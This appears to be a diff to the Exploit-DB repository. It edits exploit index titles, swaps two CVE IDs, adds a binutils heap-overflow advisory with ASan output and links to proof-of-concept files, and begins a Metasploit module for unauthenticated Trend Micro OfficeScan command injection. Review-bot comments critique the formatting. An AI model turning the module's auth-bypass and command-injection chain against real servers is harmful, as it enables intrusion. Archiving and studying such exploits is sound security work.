35846,platforms/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
|
||||
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0
|
||||
35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0
|
||||
|
@ -35332,7 +35335,7 @@ id,file,description,date,author,platform,type,port
|
|||
36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
|
||||
36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
|
||||
36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
|
||||
36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
|
||||
36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
|
||||
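Review bot: The 36220 change strips the quotes from 'com_tree', but the context row 36222 two lines below keeps 'com_shop' quoted while 36215 and 36221 are unquoted, so after this change the Joomla! component rows in this hunk are still in two styles. Pick one form for the component name and apply it to 36222 as well, or leave 36220 alone until the whole group is converted.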
|
@ -35799,7 +35802,7 @@ id,file,description,date,author,platform,type,port
|
|||
36925,platforms/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",php,webapps,0
|
||||
36926,platforms/php/webapps/36926.txt,"LeKommerce - 'id' Parameter SQL Injection",2012-03-08,Mazt0r,php,webapps,0
|
||||
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
|
||||
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
|
||||
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
|
||||
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
|
||||
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - '/help/helpredir.aspx guide' Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
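Review bot: Context row 36934 spells the product "SAP Business Objects InfoVew System" while 36935 directly below it has "InfoView". This commit is a title clean-up and the 36929 edit is three lines above, so the typo is worth fixing here; a search on the correct product name currently misses 36934.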
|
@ -36085,7 +36088,7 @@ id,file,description,date,author,platform,type,port
|
|||
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
|
||||
37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0
|
||||
37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80
|
||||
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
|
||||
39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
|
||||
37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
|
||||
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80
|
||||
37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
|
||||
|
@ -36126,7 +36129,7 @@ id,file,description,date,author,platform,type,port
|
|||
37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
|
||||
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
|
||||
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
|
||||
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
|
||||
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
|
||||
37417,platforms/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
37418,platforms/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
37419,platforms/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
|
@ -36353,7 +36356,7 @@ id,file,description,date,author,platform,type,port
|
|||
37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0
|
||||
37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
|
||||
37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0
|
||||
37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
|
||||
37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
|
||||
37773,platforms/php/webapps/37773.txt,"Joomla! Component 'com_memorix' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
|
||||
37774,platforms/php/webapps/37774.txt,"Joomla! Component 'com_informations' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
|
||||
37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0
|
||||
|
@ -36403,8 +36406,8 @@ id,file,description,date,author,platform,type,port
|
|||
37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0
|
||||
37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload and Execute Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
|
||||
37892,platforms/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80
|
||||
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
|
||||
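Review bot: The 37887 and 37888 rows only lowercase "And" to "and", whereas other hunks in this commit join two distinct issues with " / " (for example 37886 in this same hunk, "Cross-Site Scripting / Cross-Site Request Forgery"). "Disclose and Delete" and "Upload and Execute" are two actions each, so either use the slash form or state the rule that separates the two cases. The 37888 edit also silently drops the word "File" ("Upload And Execute File Exploit" becomes "Upload and Execute Exploit"), and the trailing "Exploit" in both titles is redundant in an exploit index.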
|
@ -37231,7 +37234,7 @@ id,file,description,date,author,platform,type,port
|
|||
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
|
||||
39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent Cross-Site Scripting",2016-03-28,"Sarim Kiani",multiple,webapps,80
|
||||
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
|
||||
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
|
||||
39573,platforms/windows/webapps/39573.txt,"Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
|
||||
39575,platforms/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
|
||||
39576,platforms/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
|
||||
39577,platforms/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
|
||||
|
@ -38306,7 +38309,7 @@ id,file,description,date,author,platform,type,port
|
|||
42064,platforms/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42067,platforms/multiple/webapps/42067.html,"WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
|
||||
|
@ -38320,7 +38323,7 @@ id,file,description,date,author,platform,type,port
|
|||
42101,platforms/linux/webapps/42101.py,"Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read",2017-06-01,"Gregory Draperi",linux,webapps,0
|
||||
42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0
|
||||
42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
|
||||
42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
|
||||
|
@ -38401,7 +38404,7 @@ id,file,description,date,author,platform,type,port
|
|||
42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0
|
||||
42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0
|
||||
42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
|
||||
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
|
||||
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
|
||||
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
|
||||
42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0
|
||||
42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
|
||||
|
@ -38667,3 +38670,5 @@ id,file,description,date,author,platform,type,port
|
|||
42966,platforms/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-10-09,intx0x80,jsp,webapps,0
|
||||
42967,platforms/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps,0
|
||||
42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
|
||||
42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
|
||||
42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
|
||||
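Review bot: The two added rows, 42971 and 42972, record port 0, but the 42971 module added in this same commit describes the management interface as listening on TCP port 443 by default. Other Metasploit rows in this file carry the service port (34130 has 80), so set the port column for 42971 to the documented default and confirm the value for 42972 against its module.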
|
|
|
|
@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
|
|||
Sciences xPression) - SQL Injection
|
||||
Author: Marcin Woloszyn
|
||||
Date: 27. September 2017
|
||||
CVE: CVE-2017-14758
|
||||
CVE: CVE-2017-14757
|
||||
|
||||
Affected Software:
|
||||
==================
|
||||
|
|
|
@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
|
|||
Sciences xPression) - SQL Injection
|
||||
Author: Marcin Woloszyn
|
||||
Date: 27. September 2017
|
||||
CVE: CVE-2017-14757
|
||||
CVE: CVE-2017-14758
|
||||
|
||||
Affected Software:
|
||||
==================
|
||||
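Review bot: This hunk changes the CVE line from CVE-2017-14757 to CVE-2017-14758 while the preceding hunk makes the opposite change, so the two advisories swap identifiers, yet both show the same title context ("... xPression) - SQL Injection") and nothing in either hunk names the affected endpoint or parameter. As presented the swap cannot be verified from the diff. Reference the vendor or researcher advisory that maps each CVE to its issue in the commit message, and consider making the two titles distinguishable so the assignment can be checked.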
|
|
112
platforms/linux/dos/42970.txt
Executable file
|
@ -0,0 +1,112 @@
|
|||
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
|
||||
|
||||
Description:
|
||||
binutils is a set of tools necessary to build programs.
|
||||
|
||||
The complete ASan output of the issue:
|
||||
|
||||
# nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE
|
||||
==3235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000512 at pc 0x7f7c93ae3c88 bp 0x7ffe38d7a970 sp 0x7ffe38d7a968
|
||||
READ of size 1 at 0x613000000512 thread T0
|
||||
#0 0x7f7c93ae3c87 in read_1_byte /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10
|
||||
#1 0x7f7c93ae3c87 in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2311
|
||||
#2 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
|
||||
#3 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
|
||||
#4 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
|
||||
#5 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
|
||||
#6 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
|
||||
#7 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
|
||||
#8 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
|
||||
#9 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
|
||||
#10 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
|
||||
#11 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
|
||||
#12 0x41ac18 in _init (/usr/x86_64-pc-linux-gnu/binutils-bin/git/nm+0x41ac18)
|
||||
|
||||
0x613000000512 is located 0 bytes to the right of 338-byte region [0x6130000003c0,0x613000000512)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4d8e08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-5.0.0/work/compiler-rt-5.0.0.src/lib/asan/asan_malloc_linux.cc:67
|
||||
#1 0x7f7c9393a37c in bfd_malloc /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/libbfd.c:193:9
|
||||
#2 0x7f7c9392fb2f in bfd_get_full_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/compress.c:248:21
|
||||
#3 0x7f7c939696d3 in bfd_simple_get_relocated_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/simple.c:193:12
|
||||
#4 0x7f7c93ade26e in read_section /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:556:8
|
||||
#5 0x7f7c93adef3c in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2047:9
|
||||
#6 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
|
||||
#7 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
|
||||
#8 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
|
||||
#9 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
|
||||
#10 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
|
||||
#11 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
|
||||
#12 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
|
||||
#13 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
|
||||
#14 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
|
||||
#15 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 in read_1_byte
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c267fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x0c267fff8060: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa
|
||||
0x0c267fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
|
||||
0x0c267fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x0c267fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
=>0x0c267fff80a0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==3235==ABORTING
|
||||
Affected version:
|
||||
2.29.51.20170921 and maybe past releases
|
||||
|
||||
Fixed version:
|
||||
N/A
|
||||
|
||||
Commit fix:
|
||||
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=515f23e63c0074ab531bc954f84ca40c6281a724
|
||||
|
||||
Credit:
|
||||
This bug was discovered by Agostino Sarubbo of Gentoo.
|
||||
|
||||
CVE:
|
||||
CVE-2017-14939
|
||||
|
||||
Reproducer:
|
||||
https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip
|
||||
|
||||
Timeline:
|
||||
2017-09-21: bug discovered and reported to upstream
|
||||
2017-09-24: upstream released a patch
|
||||
2017-09-26: blog post about the issue
|
||||
2017-09-29: CVE assigned
|
||||
|
||||
Note:
|
||||
This bug was found with American Fuzzy Lop.
|
||||
This bug was identified with bare metal servers donated by Packet. This work is also supported by the Core Infrastructure Initiative.
|
||||
|
||||
Permalink:
|
||||
|
||||
https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip
|
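Review bot: "Fixed version: N/A" sits directly above a "Commit fix" entry, so a reader cannot tell from this file which binutils release carries the fix. Say explicitly that the fix exists only as the linked commit until a release is tagged, and replace "and maybe past releases" with the versions that were actually tested. The 42970.zip link is also listed twice, once under "Reproducer" and again under "Proof of Concept"; one reference is enough.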
216
platforms/php/webapps/42971.rb
Executable file
|
@ -0,0 +1,216 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Trend Micro OfficeScan Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
|
||||
terminal command under the context of the web server user.
|
||||
|
||||
The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product
|
||||
has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which
|
||||
leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process
|
||||
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
|
||||
unauthenticated users can execute a terminal command under the context of the web server user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <mr_me@offensive-security.com>', # author of command injection
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
|
||||
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 443
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true }],
|
||||
['OfficeScan 11', {}],
|
||||
['OfficeScan XG', {}],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Oct 7 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def build_csrftoken(my_target, phpsessid=nil)
|
||||
vprint_status("Building csrftoken")
|
||||
if my_target.name == 'OfficeScan XG'
|
||||
csrf_token = Rex::Text.md5(Time.now.to_s)
|
||||
else
|
||||
csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0]
|
||||
end
|
||||
csrf_token
|
||||
end
|
||||
|
||||
def auto_target
|
||||
#XG version of the widget library has package.json within the same directory.
|
||||
mytarget = target
|
||||
if target['auto'] && target.name =~ /Automatic/
|
||||
